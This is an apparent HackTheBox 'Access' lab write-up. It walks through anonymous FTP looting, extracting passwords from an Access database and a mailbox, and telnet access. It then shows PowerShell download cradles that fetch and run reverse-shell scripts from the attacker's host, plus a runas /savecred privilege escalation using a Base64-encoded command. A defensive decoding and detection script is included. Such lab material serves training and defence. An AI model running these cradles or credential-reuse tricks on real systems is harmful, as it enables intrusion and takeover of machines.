# HackTheBox - Access

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3iU2D7bhkud_zX8Eu%2Fimage.png?alt=media\&token=87404e13-e1b0-4c94-80f3-853595fc8c2b)

### Nmap scan results (basic and all ports)

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3ik6G6N40rw41qaF4%2Fimage.png?alt=media\&token=fe8e5eea-0c98-4ba6-befe-05d2068bd9a1)

```
nmap -sC -sV -oA nmap-access 10.10.10.98
```

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3jcRaHU82aA2JfpVl%2Fimage.png?alt=media\&token=f53e5b38-a063-4cd4-826b-aec166fca044)

### FTP Enumeration

Anonymous FTP access is allowed, so we can download all the files present in that share.

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3koKJbXxz6eTMWadH%2Fimage.png?alt=media\&token=8ecda81c-daa3-47b7-a7b5-62ace6a3ca19)

We now have the `AccessControl.zip` and `backup.mdb` files from the FTP server.

> A file with the **MDB** file extension is a Microsoft Access Database file that literally stands for Microsoft Database. ... **MDB** files contain database queries, tables, and more that can be used to link to and store data from other files, like XML and HTML, and applications, like Excel and SharePoint.

### Exploring mdbtools

```
apt-get install mdbtools
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 # Downloading all the files
```

The first command installs the tools required for analyzing the `backup.mdb` file; the second mirrors the FTP share.

We can list all the tables using the `mdb-tables` or `mdb-sql` command.

Using mdb-tables:

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3pyXltmMTaoI9BfLf%2Fimage.png?alt=media\&token=a64d04e1-7f5f-4e00-9b12-199d2ca31560)

Using mdb-sql:

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3q743ICITBbF0l0se%2Fimage.png?alt=media\&token=277aadc8-ef60-49d5-908c-d8a13ce225c9)

To extract the information from the tables, we can use `mdb-json`.

```
# Dump every table in the database as JSON
for i in $(mdb-tables backup.mdb); do mdb-json backup.mdb "$i"; done
```

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3qLocpDh0oI287_pK%2Fimage.png?alt=media\&token=9a1df1fa-d6dc-45ff-b177-9b4b6f6bc74b)

The password for the zip file is stored inside this `backup.mdb` file, and we can search for it.

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3qkkJaP0K0q9qEu05%2Fimage.png?alt=media\&token=d6c2e743-c318-455f-8eb0-a661458d9f2c)

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3rXhrfL1O8m25LYiE%2Fimage.png?alt=media\&token=341f543a-f035-4437-8b40-1aaf8f97fa2f)

### Analyzing .pst file using readpst

We can convert the .pst file into .mbox format, which is human-readable, using the `readpst` command.

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3y2EJ9J25MEerioGm%2Fimage.png?alt=media\&token=37cc8811-67b9-4f83-8b74-d7c1638e0be3)

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3yVUwN38pX28U7xyt%2Fimage.png?alt=media\&token=0dbd9203-7136-4b5c-b157-39b79acdb172)

### Using Telnet to get shell access

The password for the security account has been changed to `4Cc3ssC0ntr0ller`.

We can use telnet to get shell access as the security user.

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3z8XSGx8rfv8CZtsL%2Fimage.png?alt=media\&token=80dca280-fe46-45ad-a7ef-0022ed1e8e27)

This shell is not really stable, and we need a stable shell for further enumeration, so we will be using the nishang shells from [github](https://github.com/samratashok/nishang/tree/master/Shells).

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3zopyAAIXs1jKZSLB%2Fimage.png?alt=media\&token=7a373da8-ea8e-40a7-a17e-081e35dc8183)

```
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/shell.ps1')"
```

Make sure to add this line at the end of the script so that it runs as soon as the script is downloaded on the target computer.

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY4-knmwY190aEB4y_H%2Fimage.png?alt=media\&token=6f7ce066-67b2-4b15-bdf9-f72654ca1a84)

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY4-oxSR37QGglkLKaQ%2Fimage.png?alt=media\&token=fcce4a96-0742-4449-800e-ab789d12a3cd)

### Running JAWS script for system enumeration

```
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/jaws-enum.ps1')
```

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY43Xtl-JpMaL7U65m-%2Fimage.png?alt=media\&token=e1ea695e-ab8c-4367-8886-0d317c65648b)

![Keep this in mind: cmdkey /list ](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY43xx0UEkRqmKrc5EV%2Fimage.png?alt=media\&token=090fe448-1753-4b90-b9bb-c8795548cdb4)

We find a very interesting file under `C:\Users\Public\Desktop`.

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY44cEOdDHGeMKBm7Rg%2Fimage.png?alt=media\&token=d8b19a61-6fde-4534-9894-b645fac89cec)

### Privilege Escalation

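We can view the raw contents of the file using the `Get-Content` command in PowerShell, or we can parse the shortcut through the `WScript.Shell` COM object instead.

```
# Parse the .lnk shortcut through the WScript.Shell COM object
$WScript = New-Object -ComObject Wscript.Shell
$shortcut = Get-ChildItem *.lnk
# Pass the full path so the shortcut resolves regardless of the working directory
$WScript.CreateShortcut($shortcut.FullName)
```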

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY45ELs49VbxlAEANgp%2Fimage.png?alt=media\&token=de4b7e08-67f4-479d-b19e-d3786ece56e1)

We can run this command as Administrator, so we will try to get a reverse shell using this.

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY47dNxhrqiUHcgQZWt%2Fimage.png?alt=media\&token=0f2288f4-0344-42a1-a368-48d83881f473)

We changed the port to 9002 since we already have a connection on port 9001. Now we need to use a Base64-encoded string to run certain Windows commands.

```
echo "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/shell2.ps1')" | iconv --to-code UTF-16LE | base64 -w 0
```

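Windows uses UTF-16 Little Endian, and we can convert the string to it using `iconv`. After that, we encode the result with `base64`. The `-w` flag specifies `wrap encoded lines after COLS character`; `-w 0` disables line wrapping, so the output is a single line.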

```
runas /user:ACCESS\Administrator /savecred "Powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADIAOgA4ADAAMAAwAC8AcwBoAGUAbABsADIALgBwAHMAMQAnACkACgA="
```

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY49WxW9jf6jAgF-vge%2Fimage.png?alt=media\&token=f381b51c-05db-4d05-aa4f-d36321f30d6f)
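From the defender's side, the same transformation is reversed when triaging process-creation logs. The Python sketch below is an added example, not part of the original write-up: it pulls a `-EncodedCommand` argument out of a command line, decodes it (Base64, then UTF-16LE), and flags `runas /savecred` and download-cradle patterns. The function names and finding labels are assumptions; the sample line is the command shown on this page.

```python
import base64
import re

# powershell.exe accepts any prefix of -EncodedCommand (-e, -enc, ...) and the alias -ec.
FLAG = re.compile(r"[-/](e[a-z]*)\s+([A-Za-z0-9+/]{16,}={0,2})", re.I)
SAVECRED = re.compile(r"\brunas(?:\.exe)?\b.*?/savecred\b", re.I)
CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biex\b|invoke-expression", re.I
)

# Sample input: the runas command line from this write-up.
SAMPLE = r'runas /user:ACCESS\Administrator /savecred "Powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADIAOgA4ADAAMAAwAC8AcwBoAGUAbABsADIALgBwAHMAMQAnACkACgA="'


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text, or None if absent or invalid."""
    for flag, blob in FLAG.findall(cmdline):
        flag = flag.lower()
        # Skip other switches that start with "e", such as -ExecutionPolicy.
        if flag != "ec" and not "encodedcommand".startswith(flag):
            continue
        try:
            raw = base64.b64decode(blob, validate=True)
            return raw.decode("utf-16-le").strip()
        except ValueError:  # covers bad Base64 and bad UTF-16LE
            continue
    return None


def triage(cmdline):
    """Return (findings, decoded_text) for one process command line."""
    findings = []
    if SAVECRED.search(cmdline):
        findings.append("runas-savecred")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("encoded-command")
        if CRADLE.search(decoded):
            findings.append("download-cradle")
    return findings, decoded


if __name__ == "__main__":
    print(triage(SAMPLE))
```

Running `cmdkey /list` on a host shows whether stored credentials exist that `runas /savecred` could reuse, which makes the `runas-savecred` finding worth correlating with that inventory.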

{% hint style="info" %}
Note: If we want to access or read all the recently cracked hashes, then we can use the following command. `cat ~/.john/john.pot`
{% endhint %}
